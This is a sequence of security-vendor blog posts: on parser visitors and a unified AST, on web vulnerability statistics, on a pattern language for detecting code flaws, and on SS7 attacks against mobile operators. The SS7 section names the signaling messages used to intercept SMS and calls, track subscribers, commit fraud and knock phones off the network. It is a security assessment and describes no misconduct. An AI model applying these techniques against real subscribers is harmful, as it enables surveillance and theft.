  • VisitErrorNode(IErrorNode node) — used when traversing tokens obtained from parsing code with lexical or syntax errors. For example, if a statement is missing a semicolon at the end, the parser will insert such a token and report it as an error. For more information about parsing errors, see the previous article.
  • AggregateResult(AstNode aggregate, AstNode nextResult) — a rarely used method intended for aggregating the results derived from the traversal of descendants.
  • ShouldVisitNextChild(IRuleNode node, AstNode currentResult) — a rarely used method that determines whether the next descendant needs to be processed, depending on the traversal result accumulated so far.
The Roslyn Visitor has specific methods for each syntactic structure and a generalized Visit method that works for all nodes. Unlike ANTLR, it has no methods for traversing "intermediate" structures. For example, Roslyn provides no VisitStatement method for statements, only specific methods such as VisitDoStatement, VisitExpressionStatement, VisitForStatement, etc. The generalized Visit method can be used instead of a VisitStatement method. Another difference is that the traversal methods for SyntaxTrivia nodes (i.e. nodes that can be removed without losing code information, such as spaces or comments) are called along with the traversal methods for the main nodes and tokens.
The drawback of using ANTLR visitors is that the names of the generated Visitor methods are directly dependent on the style of grammar rules, so they may fail to fit in with the overall code style. For example, SQL grammars use the so-called Snake case, in which the words are separated with underscore characters. Roslyn methods are written in the style of C# code. Despite the differences, processing techniques for tree structures in Roslyn and ANTLR become more and more unified with each new version (ANTLR version 3 and earlier had no support for Visitor and Listener mechanisms).

Grammar and Visitor in ANTLR

In ANTLR, the rule

ifStatement
    : If parenthesis statement elseIfStatement* elseStatement?
    | If parenthesis ':' innerStatementList elseIfColonStatement* elseColonStatement? EndIf ';'
    ;

will generate a VisitIfStatement(PHPParser.IfStatementContext context) method, wherein the context will have the following fields:
  • parenthesis — a single node.
  • elseIfStatement* — a node array; if this syntax element is missing, the array is empty.
  • elseStatement? — an optional node; if this syntax element is missing, the node is null.
  • If, EndIf — terminal nodes; they start with a capital letter.
  • ':', ';' — unnamed terminal nodes; they are not contained in the context (available only through GetChild()).
It is worth noting that the fewer rules the grammar contains, the easier and faster a Visitor can be written. However, repeating syntax still needs to be extracted into separate rules.

Alternative and element labels in ANTLR

Quite often a rule has several alternatives, and it would be logical to handle these alternatives in individual methods. Luckily, ANTLR 4 has alternative labels, which begin with a # character and are added after each rule alternative. When the parser code is generated, a separate Visitor method is created for each label, which avoids huge amounts of code when a rule has many alternatives. Either all of a rule's alternatives must be labeled, or none of them. We can use rule element labels to name a terminal denoting a set of values:
expression
    : op=('+'|'-'|'++'|'--') expression                   #UnaryOperatorExpression
    | expression op=('*'|'/'|'%') expression              #MultiplyExpression
    | expression op=('+'|'-') expression                  #AdditionExpression
    | expression op='&&' expression                       #LogicalAndExpression
    | expression op='?' expression op2=':' expression     #TernaryOperatorExpression
    ;
ANTLR generates VisitExpression, VisitUnaryOperatorExpression, VisitMultiplyExpression, and other visitors for this rule. Each Visitor will contain an expression array consisting of one or two elements and an op token. Labels keep the code clear and concise:
public override AstNode VisitUnaryOperatorExpression(TestParser.UnaryOperatorExpressionContext context)
{
    var op = new MyUnaryOperator(context.op.Text); // 'op' is a labeled token field
    var expr = (Expression)VisitExpression(context.expression(0));
    return new MyUnaryExpression(op, expr);
}
public override AstNode VisitMultiplyExpression(TestParser.MultiplyExpressionContext context)
{
    var left = (Expression)VisitExpression(context.expression(0));
    var op = new MyBinaryOperator(context.op.Text);
    var right = (Expression)VisitExpression(context.expression(1));
    return new MyBinaryExpression(left, op, right);
}
public override AstNode VisitTernaryOperatorExpression(TestParser.TernaryOperatorExpressionContext context)
{
    var first = (Expression)VisitExpression(context.expression(0));
    var second = (Expression)VisitExpression(context.expression(1));
    var third = (Expression)VisitExpression(context.expression(2));
    return new MyTernaryExpression(first, second, third);
}
...
Without using alternative labels, the processing of Expression is in the same method and the code is as follows:
public override AstNode VisitExpression(TestParser.ExpressionContext context)
{
    Expression expr, expr2, expr3;
    if (context.ChildCount == 2) // Unary
    {
        var op = new MyUnaryOperator(context.GetChild(0).GetText());
        expr = (Expression)VisitExpression(context.expression(0));
        return new MyUnaryExpression(op, expr);
    }
    else if (context.ChildCount == 3) // Binary
    {
        expr = (Expression)VisitExpression(context.expression(0));
        var binaryOp = new MyBinaryOperator(context.GetChild(1).GetText()); // the operator is the middle child
        expr2 = (Expression)VisitExpression(context.expression(1));
        return new MyBinaryExpression(expr, binaryOp, expr2);
        ...
    }
    else // Ternary
    {
        var first = (Expression)VisitExpression(context.expression(0));
        var second = (Expression)VisitExpression(context.expression(1));
        var third = (Expression)VisitExpression(context.expression(2));
        return new MyTernaryExpression(first, second, third);
    }
}
Alternative labels exist not only in ANTLR, but also in other tools for describing grammars. For example, unlike with ANTLR, an assignment operator label in Nitra is located to the left of the alternative:
syntax Expression
    {
      | IntegerLiteral
      | BooleanLiteral
      | NullLiteral            = "null";
      | Parenthesized          = "(" Expression ")";
      | Cast1                  = "(" !Expression AnyType ")" Expression;
      | ThisAccess             = "this";
      | BaseAccessMember       = "base" "." QualifiedName;
      | RegularStringLiteral;
    }

Types of nodes in a unified AST

The development of the unified AST structure was guided by the structure of the NRefactory AST. We find this structure quite simple; at the same time, full fidelity (the ability to convert the tree back to code character by character) is not required. Every node inherits from AstNode and has its own type (NodeType), which is used at the pattern matching stage and during deserialization from JSON. The structure of nodes looked like this:
In addition to the type, each node has a property that stores its location in the code (TextSpan), which is used to point at the source code when a pattern matches. A nonterminal node keeps a list of child nodes, while a terminal node keeps a numeric, string, or other primitive value.
To compare AST nodes of different languages, we created a table where each row represents the syntax of certain nodes and each column shows their implementation in the C#, Java, and PHP languages. The table looked as follows:



Explanation of the terms used in this table:
  • Expression — an expression; has a return value.
  • Statement — a statement (instruction); has no return value.
  • Literal — a terminal node.
  • Most Common Ast (MCA) — a node built if all three languages contain a node of this or a similar type (e.g., IfStatement, AssignmentExpression).
  • Most Detail Ast (MDA) — a node built if at least one language contains a node of this type (e.g., FixedStatement fixed (a) { } in C#). These nodes are more relevant to SQL-like languages, because such languages are declarative and the difference between T-SQL and C# is much more significant than between PHP and C#.
In addition to the nodes seen in the figure (and pattern nodes described in the next section) there are also artificial nodes required to build the Most Common Ast node with as little loss in syntax as possible. The examples of such nodes are:
  • MultichildExpression — inherited from Expression, but contains a collection of other Expression nodes;
  • WrapperExpression — inherited from Expression, but contains a node of an arbitrary type;
  • WrapperStatement — inherited from Statement, but contains a node of an arbitrary type.
Expressions and statements are the basic constructs of imperative programming languages. The former have a return value, while the latter execute operations; therefore, this module focuses mostly on them. These constructs are the basic building blocks of the CFG and the other source code representations required for taint analysis. Detecting vulnerabilities in source code requires no knowledge of syntactic sugar, generics, or other language-specific features, so we can rewrite syntactic sugar into basic constructs and drop some specific details.
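The rewriting of syntactic sugar into basic constructs can be illustrated with a toy pass that turns a compound assignment (x += e) into a plain assignment over a binary expression (a Python sketch with invented dict-based nodes):

```python
# Desugaring sketch: rewrite "x += e" (CompoundAssignment) into the basic
# constructs "x = x + e" (Assignment over a Binary expression).
def desugar(node):
    if isinstance(node, dict) and node.get("kind") == "CompoundAssignment":
        return {
            "kind": "Assignment",
            "target": node["target"],
            "value": {
                "kind": "Binary",
                "op": node["op"],              # the '+' of '+='
                "left": node["target"],
                "right": desugar(node["value"]),
            },
        }
    return node

sugar = {"kind": "CompoundAssignment", "op": "+",
         "target": {"kind": "Id", "name": "x"},
         "value": {"kind": "Int", "value": 1}}

core = desugar(sugar)
print(core["kind"], core["value"]["kind"])   # Assignment Binary
```

After such a pass, a matcher only ever has to know about Assignment and Binary, not about every sugared form each language offers.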
Artificial nodes representing user templates are called pattern nodes. For example, a range of numbers and regular expressions are used as literal patterns.

Testing of converters

Covering all of the code (rather than fragments of it) is a high-priority task for a code analyzer. To achieve this, we override the Visitor methods for all node types; if a node's visitor is not implemented, the default method throws a new ShouldNotBeVisitedException(context). This approach simplifies development: IntelliSense shows which methods have been overridden and which have not, and therefore which Visitor methods are already implemented.
We also have some suggestions on improving code coverage analysis. Each node of the unified AST keeps the location of the corresponding source code, and all terminals are associated with lexemes, i.e. specific sequences of characters. Since all lexemes should be processed, the coverage ratio can be expressed as

    coverage = uterms / terms

where uterms is the number of terminals in the unified AST and terms is the number of terminals in the original Roslyn or ANTLR AST.
This metric expresses code coverage as a single coefficient that should tend to unity. Evaluation via this coefficient is approximate, but it can be used to refactor and improve the Visitor code. A graphical representation of the covered terminals gives a more reliable analysis.
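Under these definitions, the metric itself is a simple ratio (a sketch; the terminal lists below are placeholders, not output of a real converter):

```python
def coverage(uast_terminals, ast_terminals):
    """Coverage ratio: uterms / terms. It approaches 1 as the converter
    learns to carry every lexeme of the original AST into the unified AST."""
    return len(uast_terminals) / len(ast_terminals)

# 3 of the 4 original terminals survived the conversion
print(coverage(["if", "(", ")"], ["if", "(", ")", ";"]))  # 0.75
```
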

Simplifying a UAST

After converting an AST to a UAST, the latter should be simplified. The simplest and most effective optimization is constant folding. For example, some code vulnerabilities are related to setting an excessively long cookie lifetime: cookie.setMaxAge(2147483647); the argument in brackets can be written either as a single number, e.g. 86400, or as an arithmetic expression, 60 * 60 * 24. Another example is string concatenation, relevant when searching for SQL injection and other vulnerabilities.
To achieve this, a Visitor for the UAST was implemented. Since simplification only reduces the number of nodes in the tree, this Visitor is typed: it accepts and returns the same type. The reflection feature in .NET allows implementing such a Visitor with little code: since each node contains either other nodes or terminal primitive values, reflection can extract all members of a particular node and process them, calling other visitors recursively.
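The constant folding described above can be sketched as a small bottom-up pass (Python, with invented dict-based nodes; the product's actual implementation is the typed .NET visitor just described):

```python
import operator

OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul}

def fold(node):
    """Collapse Binary(Int, Int) subtrees into a single Int node, bottom-up."""
    if node["kind"] != "Binary":
        return node
    left, right = fold(node["left"]), fold(node["right"])
    if left["kind"] == "Int" and right["kind"] == "Int":
        return {"kind": "Int", "value": OPS[node["op"]](left["value"], right["value"])}
    return {"kind": "Binary", "op": node["op"], "left": left, "right": right}

# 60 * 60 * 24 — the cookie-lifetime example from the text
expr = {"kind": "Binary", "op": "*",
        "left": {"kind": "Binary", "op": "*",
                 "left": {"kind": "Int", "value": 60},
                 "right": {"kind": "Int", "value": 60}},
        "right": {"kind": "Int", "value": 24}}

print(fold(expr))  # {'kind': 'Int', 'value': 86400}
```

After folding, a pattern such as a numeric range check only has to inspect a single Int node, regardless of how the constant was spelled in the source.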

Algorithm for matching AST and patterns

The algorithm tries to match the pattern, represented as a tree structure, against the tree fragment rooted at the current node. First, the node types are compared, and then the following operations are performed depending on the type:
  • Recursive comparison of descendants.
  • Comparison of simple literal types (identifiers, strings, and numbers).
  • Comparison of extended literal types (regular expressions, ranges). Comments also belong to this type.
  • Comparison of complex extended types (expressions, Statement sequences).
This approach relies on simple principles to achieve high performance with a relatively small amount of implementation code; the latter is possible because the CompareTo method for comparing nodes is implemented only for the base class, terminals, and a small number of other nodes. More sophisticated finite-state machine algorithms that improve performance are not yet required. However, it is difficult (or even impossible) to use this algorithm for more advanced analysis, e.g., analysis sensitive to semantics and covering links between different AST nodes.
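The listed comparison steps can be condensed into a short sketch (Python; the node and pattern shapes are invented for the illustration and do not mirror the product's classes):

```python
import re

def matches(pattern, node):
    """Match a pattern tree against the tree fragment rooted at node."""
    if pattern["kind"] == "AnyExpression":            # wildcard pattern node
        return True
    if pattern["kind"] != node["kind"]:               # compare node types first
        return False
    if "regex" in pattern:                            # extended literal: regex
        return re.fullmatch(pattern["regex"], node["value"]) is not None
    if "value" in pattern:                            # simple literal
        return pattern["value"] == node["value"]
    pc = pattern.get("children", [])
    nc = node.get("children", [])
    return len(pc) == len(nc) and all(                # recurse into descendants
        matches(p, n) for p, n in zip(pc, nc))

# pattern: <identifier matching (?i)password> = <any expression>
pattern = {"kind": "Assignment", "children": [
    {"kind": "Id", "regex": "(?i)password"},
    {"kind": "AnyExpression"},
]}
code = {"kind": "Assignment", "children": [
    {"kind": "Id", "value": "PassWord"},
    {"kind": "String", "value": "qwerty"},
]}
print(matches(pattern, code))   # True
```
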

Conclusion

In this article we went over the Visitor and Listener patterns used to process trees, and we described the structure of a unified AST. Next time we will tell you about:
  • Methods for storing code patterns (hardcoded, JSON, DSL).
  • Developing and using the DSL to describe patterns.
  • Examples of actual patterns and principles of searching for them in open source projects.


Author: Ivan Kochurkin, Positive Technologies

Web Application Vulnerabilities-2016: Users Unprotected



Modern web technologies allow businesses to solve organizational issues cost-effectively and efficiently, and to showcase their services and products to wide audiences through the Internet. However, attackers may exploit websites as an easy access point to company infrastructure. This can cause financial and reputational damage, yet despite well-documented security incidents, developers and administrators still pay little attention to the security of web applications.

Positive Technologies experts examine around 300 web applications each year using various techniques, from instrumental testing to source-code analysis. This report summarizes the statistics and findings gathered during penetration testing of web applications in 2015. It also compares the 2015 results with those of 2013 and 2014, tracking how web application development has evolved in the context of information security.


Cases and Methodology

We chose 30 applications from the total number examined in 2015 and conducted an in-depth analysis of each. The study covers vulnerabilities confirmed in test beds. The vulnerability assessment was conducted via black-, gray-, and white-box testing, either manually (with the aid of automated tools) or using an automated code analyzer. Black-box testing means assessing website security from the perspective of an external attacker with no "inside" knowledge of the system. Gray-box testing is similar, except that the attacker is defined as a user with some privileges in the system. White-box testing presupposes the use of all relevant information about the application, including its source code.

Our statistics only include code and configuration vulnerabilities. Vulnerabilities were categorized according to WASC TC v. 2, with the exception of Improper Input Handling and Improper Output Handling, since these threats are implemented by exploiting a number of other vulnerabilities. The severity of vulnerabilities was estimated in accordance with CVSS v. 2.

These applications belong to companies from different industries — telecoms (23%), manufacturing (20%), mass media (17%), IT (17%), finance (13%), and governmental organizations (10%).

Most of the examined web applications were written in Java (43%), followed by PHP (30%). Applications based on other languages and technologies, such as ASP.NET, Perl, ABAP, and 1С, were also used. The most common server was Nginx (34%), followed by Microsoft IIS (19%), Apache Tomcat (14%), WebLogic (14%), Apache, and SAP NetWeaver Application Server. Almost half of the resources studied were production systems, available on the Internet, but there were some test platforms still in development or acceptance when tested.

All Sites are Vulnerable

All applications contained at least medium-severity vulnerabilities. 70% of the systems studied had a critical vulnerability, and the percentage of systems with this type of vulnerability has grown consistently over the last three years.

Most of the examined applications can be used to attack their users: 80% of the investigated resources were vulnerable to Cross-Site Scripting (XSS). Successful exploitation of this vulnerability allows an attacker to inject arbitrary HTML tags, including JavaScript, into a victim's browser, obtain a session ID, or conduct phishing attacks.

The second most common flaw was Information Leakage: about 50% of applications were vulnerable. 47% of the websites were exposed to brute force attacks, and XML External Entities was among the most common high-severity vulnerabilities discovered in 2015. This security weakness allows attackers to obtain the content of server files or execute requests in the local network of the attacked server.


Most common vulnerabilities (%)

Development Tools: Java Better than PHP? 

Previous studies showed that PHP systems were more vulnerable than applications written in ASP.NET and Java. By contrast, in 2015, 69% of Java applications suffered from vulnerabilities, while PHP systems were less vulnerable: 56% in 2015 compared to 76% in 2013.


Systems with vulnerabilities of various severity levels (by development tools)

An average PHP application contains 9.1 critical vulnerabilities, a Java application contains 10.5, while applications based on other languages and development tools have only 2 vulnerabilities per application on average.

XSS had the largest share among the vulnerabilities found, regardless of programming language. The percentage of SQL Injection found in PHP applications decreased from 67% to 22% in 2015.


Most common vulnerabilities (by development tools)

Vulnerable Servers on Microsoft IIS

The percentage of applications run on Microsoft IIS with high-severity vulnerabilities increased in 2015. By contrast, vulnerabilities in Nginx and Apache Tomcat sites decreased from 86% to 57% and from 60% to 33% respectively.


Web applications with high-severity vulnerabilities (by web servers)

The most common administrative error was Information Leakage, and this weakness was detected in all applications based on Microsoft IIS. The second most common flaw was insufficient brute force protection.

Banks and IT: Industry Concerns

All banking and IT websites contained critical vulnerabilities, results similar to 2014. There was improvement only in the manufacturing industry and telecom applications.


Sites with high-severity vulnerabilities by industries

Almost Equally Vulnerable Production and Test Sites

The percentage of vulnerable applications already in production is extremely high: more than half (63%) contained critical vulnerabilities. These vulnerabilities allow an attacker to obtain full control of the system (in the case of arbitrary file upload or command execution) or sensitive information (as a result of SQL Injection, XXE, etc.). An intruder can also conduct a DoS attack.


Vulnerabilities detected for test and production systems

Source Code Analysis Detects More Vulnerabilities

Source code analysis uncovers more high-severity vulnerabilities than the black-box technique; however, even black- and gray-box testing discovered a high percentage of critical flaws (59%). Even if an intruder has no access to the source code, a web application is not necessarily secure.



Systems with vulnerabilities of various severity levels (by testing methods)

The average number of different severity vulnerabilities detected by the white-box testing is higher than the results that came from black- and gray-box testing.



Average number of vulnerabilities per system 

The study also compares manual and automated (scanner-based) white-box testing. The code analyzer discovered on average 15 critical vulnerabilities per system, while manual testing detected only 4.



Average number of specified severity vulnerabilities per system

Thus, white-box testing is more efficient than methods that lack source code analysis. Automated code analysis is especially effective for applications with large code bases and numerous libraries.

The 2015 results demonstrate how important it is to analyze web application security regularly: at all development stages and periodically (e.g., twice a year) in the course of operational use, since more than half (63%) of applications put into production contain critical vulnerabilities. These can lead to sensitive data disclosure, system compromise, or failure. It is also important to use application firewalls to protect against attacks on web applications.

You can find the full version of the report at www.ptsecurity.com/library/whitepapers/

Pattern language for a universal signature-based code analyzer

The process of signature-based code analysis in PT Application Inspector is divided into the following stages:
  1. Parsing into a language dependent representation (abstract syntax tree, AST).
  2. Converting the AST to a language-agnostic unified format (unified AST, UAST).
  3. A direct comparison with patterns described in the DSL.

The present article focuses on the third stage: ways of describing patterns, the development of a custom DSL for describing them, and examples of patterns written in this language.

Ways of describing patterns

  • Hardcoded patterns
  • JSON, XML or some other markup language
  • DSL, domain-specific language

Hardcoded patterns

Patterns can be written manually, directly in the analyzer's code. There is no need to develop a parser, but this approach is unsuitable for non-developers, though it can be used for writing unit tests. Adding new patterns requires recompiling the whole program.

JSON, XML or some other markup language

Parts of the compared AST can be stored in and retrieved directly from JSON or other data formats. This approach allows loading patterns from an external source; however, the syntax is bulky and unsuitable for editing by the user. Still, this method can be used for serialization of tree structures. (The next article in the series will present methods for serializing and traversing tree structures in .NET.)
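For example, a pattern kept as data might round-trip through JSON like this (an illustrative sketch; the field names are invented and may differ from the product's serialization format):

```python
import json

# A pattern equivalent to: password = <any string>, stored as plain data.
pattern = {
    "NodeType": "AssignmentExpression",
    "Left":  {"NodeType": "IdToken", "Regex": "(?i)password"},
    "Right": {"NodeType": "StringLiteral", "Regex": "\\w*"},
}

text = json.dumps(pattern, indent=2)   # serialize for external storage
restored = json.loads(text)            # load patterns from an external source
assert restored == pattern             # the tree round-trips losslessly
```

As the article notes, this form is trivially loadable without a custom parser, but too bulky for users to edit by hand, which motivates the DSL approach.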

Custom language for pattern description, DSL

The third approach is to develop a special domain-specific language that is easily editable and concise, while still having enough expressive power to describe existing and future patterns. The cost of this approach is the need to develop a syntax and a parser.

Practicability

As mentioned in the first article, we cannot simply describe all patterns using regular expressions. The DSL is a mix of regular expressions and frequently used constructs of programming languages. Moreover, the language is designed for a particular domain and is not expected to become any kind of standard.

Syntax

The second article in the series discussed the fact that the basic constructs of imperative programming languages are literals, expressions, and statements. We used a similar approach when developing the DSL. Examples of expressions:
  • expr(args); (method call)
  • Id expr = expr; (variable initialization)
  • expr + expr; (concatenation)
  • new Id(args); (object creation)
  • expr[expr]; (accessing an index or key).
Statements (instructions) are created by adding a semicolon at the end of an expression.
Literals are primitive types, such as:
  • Id (an identifier)
  • String (a string enclosed in double quotes)
  • Int (an integer number)
  • Bool (a boolean value)
These literals allow describing simple constructs, but not, say, a range of numbers or a regular expression. Advanced constructs (PatternStatement, PatternExpression, and PatternLiteral) were introduced to handle more complex cases. Such constructs are enclosed in special <[ and ]> brackets. The syntax was borrowed from the Nemerle language (which uses these brackets for quasi-quotation, i.e. transforming the code inside them into an AST).

Examples of the supported advanced structures are presented in the list below. Syntactic sugar, that makes things easier to read or to express, has been introduced for some structures:
  • <[]> — an extended expression operator (e.g., <[md5|sha1]> or <[0..2048]>)
  • # or <[expr]> — any Expression
  • ... or <[args]> — an arbitrary number of arguments of any kind
  • (expr.)?expr — equivalent to expr.expr or expr
  • <[~]>expr — expression negation
  • expr (<[||]> expr)* — union of several expressions (logical OR)
  • Comment: "regex" — search through the comments

Examples of patterns

Hardcoded password (all languages)


(#.)?<[(?i)password(?-i)]> = <["\w*"]>
  • (#.)? — any expression, possibly absent
  • <[(?i)password(?-i)]> — a regular expression for Id tokens, case insensitive
  • <["\w*"]> — a regular expression for String tokens
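The effect of this pattern on a single assignment can be emulated with two ordinary regular expressions (a Python sketch, not the DSL engine; note that Python's re module has no bare (?-i) construct, so a global (?i) flag is used instead):

```python
import re

def is_hardcoded_password(identifier, string_literal):
    """Rough emulation of (#.)?<[(?i)password(?-i)]> = <["\\w*"]> for one
    assignment: a case-insensitive 'password' identifier on the left and a
    word-character string literal on the right."""
    return (re.search("(?i)password", identifier) is not None
            and re.fullmatch(r"\w*", string_literal) is not None)

print(is_hardcoded_password("dbPassword", "qwerty123"))  # True
print(is_hardcoded_password("timeout", "30"))            # False
```
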

Weak random number generator (C#, Java)


new Random(...)

The flaw is caused by using an insecure algorithm for generating random numbers. The pattern catches such cases by matching the standard Random class constructor.

Debug information leak (PHP)


Configure.<[(?i)^write$]>("debug", <[1..9]>)
  • <[(?i)^write$]> — a regular expression for Id tokens, case insensitive, matching exact occurrences only
  • ("debug", <[1..9]>) — function arguments
  • <[1..9]> — a range of integers from 1 to 9

Insecure SSL connection (Java)


new AllowAllHostnameVerifier(...) <[||]> SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER

Using a "logical OR" over syntax structures: the pattern matches either the left part (a constructor invocation) or the right part (use of a constant).

Password in comments (all languages)


Comment: <[ "(?i)password(?-i)\s*\=" ]>

Search for comments in the source code. Single-line comments begin with a double slash // in C#, Java, and PHP, while a double hyphen -- is used in SQL-like languages.
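The comment check can be emulated with ordinary regular expressions keyed by comment syntax (a Python sketch, not the DSL engine; Python's re lacks a bare (?-i), so a global (?i) flag is used):

```python
import re

# Single-line comment markers per language family, as listed above.
COMMENT = {"csharp": r"//(.*)", "java": r"//(.*)", "php": r"//(.*)",
           "sql": r"--(.*)"}
PASSWORD = re.compile(r"(?i)password\s*=")   # the pattern's regex

def comment_has_password(line, lang):
    """Extract the single-line comment, if any, and test it against the regex."""
    m = re.search(COMMENT[lang], line)
    return bool(m and PASSWORD.search(m.group(1)))

print(comment_has_password("x = 1; // password = qwerty", "java"))  # True
print(comment_has_password("SELECT 1 -- PASSWORD= abc", "sql"))     # True
print(comment_has_password("x = 1; // just a note", "php"))         # False
```
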

SQL Injection (C#, Java, and PHP)


<["(?i)select\s\w*"]> + <[~"\w*"]>

A simple SQL injection is the concatenation of any string beginning with SELECT and containing a non-string expression on the right side.

Cookie without the Secure flag (PHP)

session_set_cookie_params(#,#,#)

A cookie has been set without the Secure flag, which is configured in the fourth argument.

An empty try catch block (all languages)


try {...} catch { }

An empty exception handling block. If the Pattern Matching module analyzes C# source code, the following code will be matched:

try
{
}
catch
{
}

The matching result for T-SQL source code:
BEGIN TRY
SELECT 1/0 AS DivideByZero
END TRY
BEGIN CATCH
END CATCH
The matching result for PL/SQL source code:
PROCEDURE empty_default_exception_handler IS
BEGIN
INSERT INTO table1 VALUES (1, 2, 3, 4);
COMMIT;
EXCEPTION
WHEN OTHERS THEN NULL;
END;

Cookie without the Secure flag (Java)

Cookie <[@cookie]> = new Cookie(...);
...
<[~]><[@cookie]>.setSecure(true);
...
response.addCookie(<[@cookie]>);

Adding a cookie without the Secure flag. Although this pattern is better implemented using taint analysis, we also managed to implement it with the more primitive matching algorithm. It uses a pinned @cookie variable (by analogy with back references in regexes), negation of an expression, and an arbitrary number of statements.

Cursor Snarfing (PL/SQL, T-SQL)

PL/SQL
<[@cursor]> = DBMS_SQL.OPEN_CURSOR;
...
<[~]>DBMS_SQL.CLOSE_CURSOR(<[@cursor]>);
T-SQL
declare_cursor(<[@cursor]>);
...
<[~]>deallocate(<[@cursor]>);

A dangling cursor can be exploited by a less privileged user. Moreover, most unreleased resource issues result in general software reliability problems.

If the Pattern Matching module analyzes T-SQL source code, the following code will be matched:

DECLARE Employee_Cursor CURSOR FOR
SELECT EmployeeID, Title FROM AdventureWorks2012.HumanResources.Employee;
OPEN Employee_Cursor;
FETCH NEXT FROM Employee_Cursor;
WHILE @@FETCH_STATUS = 0
BEGIN
FETCH NEXT FROM Employee_Cursor;
END;
--DEALLOCATE Employee_Cursor; is missing
GO

Excessively granted privileges (PL/SQL, T-SQL)


grant_all(...)

This flaw may result in inappropriate and excessive privileges being assigned to a user. Although the GRANT ALL phrase is actually an SQL statement, it is converted into a function call, as the pattern matching module doesn't have the notion of a "query".

The following code will be matched: GRANT ALL ON employees TO john_doe;

Summary

We’ve prepared a video to demonstrate the functionality of our Pattern Matching module in PT Application Inspector. This video explains the process of matching against certain patterns of the source code written in different programming languages (C#, Java, PHP). We also show you the proper way to handle syntax errors, which was discussed in the first article in this series.


Next time we will tell you about:
  • Matching, serialization, and traversal of tree structures in .NET
  • Building the CFG, DFG and taint analysis
Author: Ivan Kochurkin, Positive Technologies

Attacking SS7: Mobile Operators Security Analysis



The interception of calls is quite a challenging task, but not only intelligence services can pull it off. A subscriber may become a victim of an average hacker who is familiar with the architecture of signaling networks. Commonly known SS7 vulnerabilities allow for the interception of phone calls and texts, can reveal a subscriber’s location, and can disconnect a mobile device from a network.

In 2015, Positive Technologies experts conducted 16 sets of testing involving SS7 security analysis for leading mobile EMEA and APAC operators. The results of the top three projects are included in the statistics below. In this article, we will review the security level experienced by mobile network subscribers, as well as all industrial and IoT devices — from ATMs to GSM gas pressure control systems, which are also considered mobile network subscribers. This article describes detected issues and suggests ways to counter threats.

Due to confidentiality agreements, we cannot disclose the names of companies that took part in the research, but half of the examined SS7 networks belong to large mobile operators with more than 40 million subscribers.



Subscriber database size

Hello from the 70s

The SS7 system (CCS7), which dates back to the 1970s, is riddled with security vulnerabilities, such as the absence of encryption and of service message validation. For some time this posed no risk to subscribers or operators, as the SS7 network was a closed system available only to landline operators. Since then, however, the network has evolved to meet new standards of mobile connection and service support. In the early 21st century, a set of signaling transport protocols called SIGTRAN was developed. SIGTRAN is an extension to SS7 that allows the use of IP networks to transfer messages, and this innovation means the signaling network is no longer isolated.

It is important to note that it is still impossible to penetrate the network directly: a hacker would need an SS7 gateway. But getting access to such a gateway is relatively easy, as anyone may obtain an operator's license in countries with lax laws or purchase access on the black market from a legal operator. There are several ways to get into a network using hacked carrier equipment, a GGSN, or a femtocell. If there is an engineer in a hacker group, they will be able to conduct a chain of attacks using legitimate commands or connect their own equipment to SS7.

SS7 attacks may be performed from anywhere, and an attacker doesn't have to be in physical proximity to a subscriber, so it is almost impossible to pinpoint the attacker. Nor does the attacker need to be a highly skilled professional: many SS7 applications are available on the internet, and cellular carriers cannot block commands from individual hosts without an unavoidable negative effect on service and a violation of roaming principles.

SS7 vulnerabilities were first demonstrated in 2008, when German researcher Tobias Engel showed a technique that allows someone to spy on mobile subscribers. In 2014, Positive Technologies experts presented their report “How to Intercept a Conversation Held on the Other Side of the Planet”. In 2015, Berlin hackers from SR Labs were able to intercept SMS correspondence between Australian senator Nick Xenophon and a British journalist during a live broadcast of the Australian TV program “60 Minutes”. They also managed to geo-track the politician during his business trip to Tokyo.

Espionage, Calls, and SMS Interception

The overall security level of the examined SS7 networks was far below average. In 2015, the following problems with SS7 networks of major mobile operators were found: subscriber data leakage (77% of successful attempts), network operation disruption (80%), and fraud (67%).

We were able to intercept incoming texts in each network, and almost nine out of ten attempts (89%) were successful. This reflects poorly on security, as SMS messages are frequently used in two-factor authentication systems and for password recovery on various websites. To test this, we employed the UpdateLocation method: the adversary registers a target subscriber in a false network, after which all incoming SMS messages are delivered to the address the adversary indicated.



Successful attacks targeted to obtain sensitive information by type

It was also possible to retrieve balance data in almost every single case (92% of attacks) using the ProcessUnstructuredSS-Request message, the body of which contains the corresponding USSD command.

The security of voice calls is better, as only half of interception attacks were successful, but that is still a large risk for subscribers. To test terminating calls, we used roaming number spoofing; for originating calls, tapping was performed using the InsertSubscriberData method. In both cases, we redirected traffic to a different switch.



Location tracking methods (ratio of successful attacks)

We managed to find out a subscriber’s geodata in all but one network. The most effective methods were SendRoutingInfo and ProvideSubscriberInfo. The latter allowed access over half of the time (53%).

The most valuable subscriber data is the IMSI, as this unique number is essential for the majority of attacks. The easiest way to obtain it is using the SendRoutingInfo method.



Information leakage methods (ratio of successful attacks)

The SendRoutingInfoSM method worked in 70% of cases. It is used for incoming texts to inquire routing data and location, and SendIMSI allows a hacker to obtain a subscriber’s identifier but it is less effective (25% success rate).

Committing Fraud

Each system has its own flaws that allow outsiders to conduct fraudulent actions like call redirection, money transfer from a subscriber’s account, and modification of a subscriber’s profile.


Ratio of successful attacks

The majority of redirection attacks for terminating calls were successful (94%) due to numerous problems related to SS7 protocols and system architecture.

We were able to forward originating calls in only 45% of cases using InsertSubscriberData.

We also performed roaming number spoofing and redirection manipulation to forward terminating calls. Roaming number spoofing is carried out during a terminating call to a victim, who has to be registered in the fake network beforehand. In response to a roaming number inquiry, the attacker sends a redirection number, and the cellular carrier has to pay the expenses for all established connections.
Redirection manipulation is unauthorized unconditional forwarding: all terminating calls are redirected to a given number at the subscriber’s expense.


Methods of terminating calls forwarding (ratio of successful attacks)

Modification of a subscriber’s profile was successful in over half of attack attempts using InsertSubscriberData (54%). An attacker can change the profile so that originating calls bypass an operator’s billing system. This attack can be used to direct traffic to premium rate numbers and costly locations at the expense of a cellular carrier.

Subscriber DoS Attack

In order to make subscriber equipment (phone, modem, GSM signaling system or sensor) unavailable for incoming transactions, a hacker may conduct targeted attacks on mobile network subscribers. The majority of researched SS7 networks are vulnerable to DoS attacks (80% success rate).

In all cases, we used the UpdateLocation method, which requires prior knowledge of a subscriber's IMSI. The UpdateLocation message is sent to the operator's network informing HLR of the subscriber's registration in a false network. Then all terminating calls are routed to the address specified during the attack.

What Makes SS7 Vulnerable

